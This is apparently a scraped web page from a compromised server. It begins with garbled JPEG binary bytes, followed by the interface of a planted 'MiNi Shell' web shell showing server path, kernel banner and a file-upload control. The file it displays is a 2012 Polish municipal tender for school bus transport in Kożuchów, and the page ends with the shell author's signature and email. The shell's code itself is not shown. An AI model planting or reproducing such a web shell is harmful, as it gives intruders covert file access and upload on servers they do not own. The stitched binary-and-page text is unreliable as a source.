JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/250032-N-2012.html

<p class="kh_header"><b>Kożuchów: Dowozy dzieci i młodzieży do placówek oświatowych na terenie gminy Kożuchów w roku szkolnym 2012/2013</b><br>
<b>Numer ogłoszenia: 250032 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kożuchów , ul. Rynek 1A, 67-120 Kożuchów, woj. lubuskie, tel. 68 355 59 40, faks 68 355 28 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozy dzieci i młodzieży do placówek oświatowych na terenie gminy Kożuchów w roku szkolnym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie regularnych usług przewozowych w postaci dowozu uczniów do i z placówek oświatowych na terenie miasta i gminy Kożuchów w komunikacji otwartej w roku szkolnym 2012/13 tj. od dnia 03.09.2012 r. do 28.06.2013 r.
Świadczenie usług przewozowych odbywać się będzie do następujących placówek oświatowych:
- Szkoła Podstawowa Nr 1 w Kożuchowie,
- Szkoła Podstawowa Nr 2 w Kożuchowie,
- Szkoła Podstawowa  w Mirocinie Dolnym,
- Samorządowe Gimnazjum w Kożuchowie,
- Przedszkole Miejskie Nr 1 w Kożuchowie.
Wykaz miejscowości z których prowadzone będą dowozy wraz z ilością uczniów dowożonych do każdej z w/w placówek stanowi załącznik Nr 2 do niniejszej specyfikacji. Wykonawca ma obowiązek zapewnić wszystkim uczniom dowóz do szkół przed rozpoczęciem i odwóz po zakończeniu zajęć lekcyjnych.
Godziny rozpoczęcia i zakończenia zajęć lekcyjnych w poszczególnych placówkach:
- Szkoła Podstawowa Nr 1 w Kożuchowie :
-rozpoczęcie zajęć  - godz. 8.00,
-zakończenie zajęć - godz. 12.40, 13.30, 14.25,
-zakończenie zajęć w dniu 03.09.2012 r. - godz.9.40,
-zakończenie zajęć w dniu 28.06.2013 r. - godz.10.40, 
- Szkoła Podstawowa Nr 2 w Kożuchowie :
-rozpoczęcie zajęć  - godz. 8.00,
-zakończenie zajęć - godz. 13.35,
-zakończenie zajęć w dniu 03.09.2012 r. - godz.9.40,
-zakończenie zajęć w dniu 28.06.2013 r. - godz.10.40, 
- Szkoła Podstawowa w Mirocinie Dolnym:
-rozpoczęcie zajęć  - godz. 8.00,
-zakończenie zajęć - godz. 13.30,14.25,
-zakończenie zajęć w dniu 03.09.2012 r. - godz.10.40,
-zakończenie zajęć w dniu 28.06.2013 r. - godz.10.40, 
- Samorządowe Gimnazjum w Kożuchowie:
-rozpoczęcie zajęć  - godz. 8.00,
-zakończenie zajęć - godz. 14.25(czwartek, piątek),15.20 (poniedziałek, wtorek, środa),
-zakończenie zajęć w dniu 03.09.2012 r. - godz.10.40,
-zakończenie zajęć w dniu 28.06.2013 r. - godz.10.40,
- Przedszkole Miejskie Nr 1 w Kożuchowie
-rozpoczęcie zajęć  - godz. 7.00 - 7.30,
-zakończenie zajęć - godz. 12.00.
2.	Harmonogram dowozów dzieci w rozbiciu na poszczególne miejscowości:
Zamówienie wstępnie zostało podzielone na 7 tras. Zamawiający informuje, że podział na trasy jest opisem wstępnych wymagań i oczekiwań Zamawiającego. Podział ten nie stanowi ograniczeń dla proponowanych przez Wykonawcę koncepcji świadczenia usług przewozowych dzieci. 
1)	Trasa nr 1 
a.	Dowozy: Książ Śląski - SP Mirocin Dolny  - Mirocin Średni - Mirocin Górny - Mirocin Górny k/w - Kożuchów Gimnazjum
b.	Odwozy tą samą trasą z SP Mirocin Dolny do Książa Śląskiego (z możliwością uwzględnienia odwozów dzieci z miejscowości Studzieniec wracających z SP w Mirocinie Dolnym) oraz z Gimnazjum w Kożuchowie do Książa Śląskiego.
	Łącznie ok. 40  km

2)	Trasa nr 2 
a.	Dowozy: Studzieniec - Studzieniec - SP Mirocin Dolny - Kożuchów Gimnazjum -  Mirocin Górny wieś - Mirocin Górny - Mirocin Średni - SP Mirocin Dolny - Studzieniec - Studzieniec - SP Mirocin Dolny.
b.	Odwozy: SP Mirocin Dolny - Mirocin Średni - Mirocin Górny - Mirocin Górny wieś - Kożuchów Gimnazjum - SP Mirocin Dolny - Studzieniec - Studzieniec (w przypadku, gdy zostanie uwzględniony odwóz dzieci z miejscowości Studzieniec na trasie nr 1, jeśli jednak tak nie będzie, należy wówczas uwzględnić konieczność odwozu dzieci z SP w Mirocinie Dolnym do Studzieńca, a następnie jw.)
Łącznie ok. 47 km

3)	Trasa nr 3 
a.	Dowozy: Radwanów - Broniszów - SP Mirocin Dolny - Kożuchów Gimnazjum
b.	Odwozy: Kożuchów Gimnazjum - SP Mirocin Dolny - Radwanów - Broniszów 
Łącznie ok. 30 km

4)	Trasa nr 4
a.	Dowozy: Stypułów skrzyżowanie - Stypułów Nowa Wieś - SP Stypułów - Stypułów PKP - Stypułów PGR II - Stypułów PGR I - SP Stypułów - Stypułów PKP - Stypułów PGR II - Stypułów PGR I - Stypułów skrzyżowanie - Cisów - SP nr 1 Kożuchów - Kożuchów Gimnazjum
b.	Odwozy: SP nr 1 Kożuchów - Cisów - Stypułów skrzyżowanie - SP Stypułów - Stypułów PGR I - Stypułów PGR II - Stypułów PKP - SP Stypułów - Stypułów Nowa Wieś oraz Kożuchów Gimnazjum - SP nr 1 Kożuchów - Cisów - Stypułów skrzyżowanie - Stypułów PGR I - Stypułów PGR II - Stypułów PKP - SP Stypułów - Stypułów Nowa Wieś
Łącznie ok. 60 km

5)	Trasa nr 5 
a.	Dowozy: Solniki - Czciradz - SP nr 2 Kożuchów, Przedszkole nr 1 - SP nr 1 Kożuchów - Kożuchów Gimnazjum
b.	Odwozy: SP nr 1 Kożuchów - SP nr 2 Kożuchów. Przedszkole nr 1 - Czciradz - Solniki oraz Kożuchów Gimnazjum - SP nr 1 Kożuchów - SP Kożuchów nr 2, przedszkole nr 1 - Czciradz - Solniki
Łącznie ok. 30 km

6)	Trasa nr 6
a.	Dowozy: Lasocin - Bielice - Dziadoszyce - Zawada - Solniki - SP 2 Kożuchów, przedszkole nr 1, SP nr 1 Kożuchów - Gimnazjum Kożuchów
b.	Odwozy: SP nr 1 Kożuchów - SP nr 2 Kożuchów, przedszkole 1 - Solniki - Zawada - Dziadoszyce - Bielice - Lasocin oraz Gimnazjum Kożuchów - SP nr 1 - SP nr 2, przedszkole nr 1 - Solniki - Zawada - Dziadoszyce - Bielice - Lasocin
Łącznie ok. 41 km

7)	Trasa  nr 7 
a.	Dowozy: Słocina - Podbrzezie Dolne ul. Zygmuntowska - Podbrzezie Górne ul. Żagańska - SP nr 1 Kożuchów - Gimnazjum Kożuchów - Drwalewice - Sokołów - SP nr 2 Kożuchów, przedszkole 1 - SP nr 1 - Gimnazjum Kożuchów
b.	Odwozy: SP nr 1 Kożuchów - SP nr 2 Kozuchów, przedszkole 1 Kożuchów - Sokołów - Drwalewice - Podbrzezie Górne ul. Żagańska - Podbrzezie Dolne ul. Zygmuntowska - Słocina oraz Gimnazjum Kożuchów -  SP nr 1 Kożuchów- SP nr 2 Kożuchów, przedszkole nr 1 Kożuchów - Sokołów - Drwalewice - Podbrzezie Górne ul. Żagańska - Podbrzezie Dolne ul. Zygmuntowska - Słocina
Łącznie ok. 70 km

3.	Dodatkowe wymagania dotyczące przedmiotu zamówienia :

1)	Wszystkie dzieci winne być dowiezione do szkół przed rozpoczęciem zajęć.
2)	Zamawiający zastrzega możliwe odstępstwa od podanego harmonogramu przewozów, uzależnione od zmiany planów lekcji, ilości dzieci, zmiany organizacji roku szkolonego, odpracowywania dni wolnych.
3)	Zaleca się wykonawcom dokonanie wizji lokalnej celem zapoznania się z warunkami wykonywania przedmiotu zamówienia.
4)	Szacunkowy, łączny, dzienny kilometraż tras wynosi ok. 318 km.
5)	Szczegółowa, imienna lista dowożonych (w rozbiciu na poszczególne placówki oświatowe) zostanie podana do wiadomości Wykonawcy przed rozpoczęciem każdego semestru - liczba uczniów uprawnionych do korzystania z dowozów szkolnych - 493
6)	Organizacja roku szkolnego jest uregulowana w rozporządzeniu Ministra Edukacji Narodowej  i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz.U. z 2002 r. Nr 46, poz. 432, z późn. zm.).
7)	 Wykonawca winien posiadać odpowiednią ilość sprawnych technicznie autobusów zdolnych do przewiezienia 493 uczniów w jak najkrótszym czasie - dowozy i odwozy.
8)	Pojazdy uczestniczące w przewozach muszą mieć ważne polisy ubezpieczeniowe OC i NW oraz aktualne badania techniczne.
9)	Wykonawca musi dysponować ilością kierowców odpowiednią do realizacji zamówienia, przy czym kierowcy musza posiadać stosowne uprawnienia tj. ważne prawo jazdy kategorii D, ważne świadectwo kwalifikacji lub zaświadczenie o ukończeniu kursu dokształcającego kierowców przewożących osoby.
10)	Wykonawca zobowiązany jest do zapewnienia opiekunów nad dziećmi w trakcie transportu.
11)	Wykonawca ponosi wszelką odpowiedzialność za działania bądź zaniechania opiekunów.
12)	Opiekun musi uczestniczyć w każdym przewozie dzieci.
13)	Wszelkie koszty związane z zapewnieniem opiekunów, ponosi wyłącznie Wykonawca 
14)	Rozliczenia będą dokonywane z dołu, w cyklu miesięcznym i na podstawie zestawienia miesięcznych biletów imiennych.
15)	Wykonanie przedmiotu umowy winno być zgodne z ustawą z dnia 15 listopada 1984 r. Prawo przewozowe (tekst jedn.: Dz. U. z 2000 r. Nr 50, poz. 601), oraz ustawie z dnia 6 września 2001 r. o transporcie drogowym (tekst jedn.: Dz.U. z 2007 r. Nr 125, poz. 874z póź. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 3.000,00zł (słownie: trzy tysiące złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank Spółdzielczy w Kożuchowie Nr 49967300070000000010070006
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy załączyć do oferty (w osobnej kopercie).
7.	Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Wykonawca składa oświadczenie w zakresie art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Wykonawca składa oświadczenie w zakresie art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli przedstawi Zamawiającemu zgodnie z załącznikiem nr 4 do SIWZ, że dysponuje co najmniej 7 pojazdami do przewozu osób o liczbie miejsc siedzących od 39 do 55.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Wykonawca składa oświadczenie w zakresie art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli posiadaja aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum 400.000,00zł (słownie: czterysta tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty - załącznik nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany umowy spowodowane:
a.	ilością uczniów - w przypadku wzrostu lub spadku liczby uczniów Zamawiający zapłaci Wykonawcy wynagrodzenie zgodne z faktyczną ilością zakupionych biletów miesięcznych;
b.	zmianą planów lekcji - w takim przypadku możliwa będzie zmiana harmonogramu dowozów dzieci z uwzględnieniem nowego planu lekcji,
c.     zmianą lokalizacji przystanków - w takim przypadku możliwa będzie zmiana harmonogramu dowozów uwzględniająca nowe przystanki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozuchow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kożuchowie
ul. Rynek 1a
67-120 Kożuchów
pokój nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2012 godzina 10:00, miejsce: Urząd Miejski w Kożuchowie
ul.Rynek1a
67-120 Kożuchów
pokój nr 9 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com